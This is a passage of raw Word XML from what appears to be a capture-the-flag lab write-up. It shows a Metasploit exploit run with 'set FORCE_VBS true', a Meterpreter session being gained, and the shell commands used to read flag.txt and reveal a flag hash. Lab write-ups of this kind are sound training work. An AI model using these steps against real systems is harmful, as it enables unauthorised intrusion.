    </w:p>
    <w:p w14:paraId="755E98F1" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>set FORCE_VBS true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491E46EB" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299386DB" w14:textId="29D88119" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A"/>
    <w:p w14:paraId="1BA93F1A" w14:textId="704C8CBE" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="00E925FE" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43C03994" wp14:editId="7FA66A4B">
            <wp:extent cx="5842300" cy="2959252"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="789835127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35127" name="Picture 24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07CE" w14:textId="5F91D63D" w:rsidR="00E925FE" w:rsidRDefault="00E925FE" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78D4C271" wp14:editId="74D7D909">
            <wp:extent cx="5708943" cy="2736991"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="10266583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58332" name="Picture 10266583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27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7B09" w14:textId="0EF21AB0" w:rsidR="00E925FE" w:rsidRDefault="00E925FE" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78F6833D" wp14:editId="59F470A9">
            <wp:extent cx="5766096" cy="2387723"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="21334425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42591" name="Picture 21334425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7D1F" w14:textId="17AE246F" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">We have gained the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135ADC57" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t> Find the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC3B36C" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C70A74" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>cd /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE8E446" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="708A2CFD" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FECE4C3" w14:textId="25A5427D" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="00E925FE" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FF4813D" wp14:editId="502DEF2F">
            <wp:extent cx="5308873" cy="1511378"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="625479492" name="Picture 27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79492" name="Picture 27" descr="A computer screen shot of a numb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873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FA9C" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>We have discovered the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C2DD5" w14:textId="178E99AB" w:rsidR="00853ABF" w:rsidRDefault="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidR="00E925FE" w:rsidRPr="00E925FE">
        <w:t>3c716f95616eec677a7078f92657a230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E24135" w14:textId="02ECDA3A" w:rsidR="000D3777" w:rsidRDefault="000D3777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="537C9964" wp14:editId="2829446D">
            <wp:extent cx="4432528" cy="1206562"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="2026363238" name="Picture 31" descr="A black and white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63238" name="Picture 31" descr="A black and white photo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C0C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B7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86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FC"/>
    <w:rsid w:val="000D3777"/>
    <w:rsid w:val="001200CE"/>
    <w:rsid w:val="0016682A"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00566BFC"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00781A0B"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00E9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BD053"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{812A05AD-64DD-4EEE-87D2-BCC6EB521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2025-08-27T19:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-27T19:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>